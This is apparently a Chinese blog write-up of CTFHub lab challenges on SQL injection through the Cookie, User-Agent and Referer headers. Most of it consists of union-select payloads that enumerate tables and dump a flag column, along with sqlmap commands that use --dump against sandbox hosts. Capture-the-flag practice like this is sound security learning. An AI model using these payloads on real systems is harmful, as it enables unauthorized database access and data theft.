Cookie 注入的原理也和其他注入一样,只不过是将提交的参数已 Cookie 方式提交,而一般的注入是使用 GET 或者 POST 方式提交,GET 方式提交就是直接在网址后面加上需要注入的语句,POST 方式则是通过表单,GET 和 POST 的不同之处就在于可以通过 IE 地址栏处看到我们提交的参数,而 Cookie 注入却不能。
cookie注入原理详解(一) - tooltime - 博客园 (cnblogs.com)
打开网址,使用bp抓包,并发送到重放器
对Cooike:位置后的内容进行修改
Cookie: id=1 order by 1,2;
使用union select
cookie:id=1 union select 1,2;
知道注入点在2上
Cookie: id=-1 union select 1,database();
得到数据库库名为sqli
Cookie: id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1);
vfdozendrn
得知表名为vfdozendrn
Cookie: id=-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='vfdozendrn' limit 0,1);
faxqgkdawi
知道字段名为 faxqgkdawi
Cookie: id=-1 union select 1,group_concat(faxqgkdawi) from vfdozendrn;
得到flag
使用hackbar工具,选择Cooikes
id=1 and 1 = 1 #
id=1 order by 2 #
id=1 order by 3 #
id=0 union select 1,database()#
id=0 union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
查找得到两个数据表vfdozendrn,news
id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='news' #
查询表vfdozendrn中的内容
id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='vfdozendrn' #
得到字段名faxqgkdawi
id=0 union select 1,group_concat(vfdozendrn) from sqli.faxqgkdawi #
得到flag
http://challenge-29b4e435702d0e45.sandbox.ctfhub.com:10800
sqlmap -u http://challenge-29b4e435702d0e45.sandbox.ctfhub.com:10800/ --cookie "id=1" --level 2 --dbs --batch
sqlmap -u http://challenge-29b4e435702d0e45.sandbox.ctfhub.com:10800/ --cookie "id=1" --level 2 -D sqli --tables --batch
vfdozendrn
sqlmap -u http://challenge-29b4e435702d0e45.sandbox.ctfhub.com:10800/ --cookie "id=1" --level 2 -D sqli -T vfdozendrn --columns --batch
faxqgkdawi
sqlmap -u http://challenge-29b4e435702d0e45.sandbox.ctfhub.com:10800/ --cookie "id=1" --level 2 -D sqli -T vfdozendrn -C faxqgkdawi --dump --batch
CTFHUB-技能树-Web前置技能-SQL注入-Mysql结构-Cookie注入-CSDN博客
CTFHub | UA注入_ctfhub ua注入-CSDN博客
就是User-Agent的缩写,中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。
直接使用burp suite抓包工具抓取题目网站的信息
题目已经告诉我们输入点在UA中,直接在UA中使用'1 and 1 = 1'进行测试
继续在UA请求头中使用'1 and 1 = 2'进行测试,发现此题存在UA注入
使用order by
从order by 1开始
1 order by 1
判断字段2,使用order by 2
判断字段3,使用order by 3,
这里无回显,那么字段数量为2列
使用union select 1,2查看未发现数据
1 union select 1,2
判断数据可能不存在数据库中,将1改为0查看数据,其他符号也可以
0 union select 1,2
修改2为version()
0 union select 1,version()
发现数据库版本为MariaDB 10.3.22
修改2为database()
0 union select 1,database()
发现数据库版本为sqli
查看全部数据库名
0 union select 1,group_concat(schema_name)from information_schema.schemata
在全部数据库名中发现sqli,最后在sqli数据库中发现zdebjmphat和news两个表名
0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
zdebjmphat
先查看zdebjmphat表中的全部字段名,发现一个数据名为htgdqscwhc
0 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='zdebjmphat'
htgdqscwhc
查看数据htgdqscwhc中的内容,发现此题flag
0 union select 1,group_concat(htgdqscwhc) from sqli.zdebjmphat
Sqlmap全参数详解 - 狼人:-) - 博客园 (cnblogs.com)
sqlmap支持五种不同的注入模式:
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入
CTFHUB-技能树-Web前置技能-SQL注入-Mysql结构-UA注入-CSDN博客
UA注入 需要用到leve 3
http://challenge-cf89ab126dc80c6b.sandbox.ctfhub.com:10800
sqlmap -u http://challenge-cf89ab126dc80c6b.sandbox.ctfhub.com:10800/ -level 3 --dbs --batch
sqlmap -u http://challenge-cf89ab126dc80c6b.sandbox.ctfhub.com:10800/ --level 3 -D sqli --tables
zdebjmphat
sqlmap -u http://challenge-cf89ab126dc80c6b.sandbox.ctfhub.com:10800/ --level 3 -D sqli -T zdebjmphat --columns
sqlmap -u http://challenge-cf89ab126dc80c6b.sandbox.ctfhub.com:10800/ --level 3 -D sqli -T zdebjmphat -C htgdqscwhc --dump
看大佬题解时,大佬提到了这个问题:
CTFHub | Refer注入_ctfhub的refer注入-CSDN博客
[CTFhub]CTFhub技能树SQL注入——Refer注入-CSDN博客
使用bp抓包,发送到重放器
抓到的信息中没有Refer请求,那么可以直接写入Refer请求进行测试
放包后,使用hackbar传入id=1
Referer字段通常用于告诉服务器请求的来源,即用户是通过哪个页面或链接访问当前页面的。 需要向页面发送一个请求后,才会带上Reder字段。
传参的同时进行抓包
referer:1
页面存在回显,可以使用联合查询。
referer:1'
页面不存在回显。
referer:1 and 1=1
页面存在回显
referer:1 and 1=2
页面不存在回显。可判断此处是数字型注入
select 语句有几列那么需要输入几列。Sqli 中有两列,所以输入1和2,判断数字的回显位置。
referer: 1 union select 1,2
判断数据可能不存在数据库中,将1改为0查看数据,其他符号也可以
referer: -1 union select 1,2
把第1列换成了version()版本号,2换成了database() 数据库名称
-1 union select version(),database()
可得知数据库为:sqli
补充:
group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
information_schema:关系型数据库中,包括 MySQL、PostgreSQL等,存在一个系统数据库叫做 "information_schema",它存储了关于数据库中元数据(metadata)的信息。
information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。
-1 union select version(),group_concat(table_name)from information_schema.tables where table_schema=database()
库中存在两个表,分别为:kyqdxfnkmp,news
-1 union select version(),group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='kyqdxfnkmp'
kyqdxfnkmp库中的列名为:ttzqiiunct
-1 union select version(),ttzqiiunct from kyqdxfnkmp
或者
-1 union select 1,group_concat(ttzqiiunct) from sqli.kyqdxfnkmp
得到flag
CTFHub——技能树——SQL注入(sqlmap)-CSDN博客
sqlmap使用:ctfhub靶场查询SQL注入+查询Cookie注入+查询UA注入+Refer注入_sqlmap flag 查表-CSDN博客
关于此题如何使用sqlmap,做了很多尝试,仍然无法解出。
网址
http://challenge-16d8adb4f3e8663f.sandbox.ctfhub.com:10800
sqlmap -u http://challenge-16d8adb4f3e8663f.sandbox.ctfhub.com:10800/ -level 3 --dbs --batch
python sqlmap.py -u http://challenge-16d8adb4f3e8663f.sandbox.ctfhub.com:10800 -level 3
sqlmap -r "refer.txt" -level 3 --current-db --batch (sqli)
CTFhub Web SQL注入 篇至此结束
感谢在茫茫的互联网电子荒原中,你浏览到这几篇赛博垃圾。博客内容较为粗糙劣质,诸位大佬,如有高见,还请斧正,直说无妨。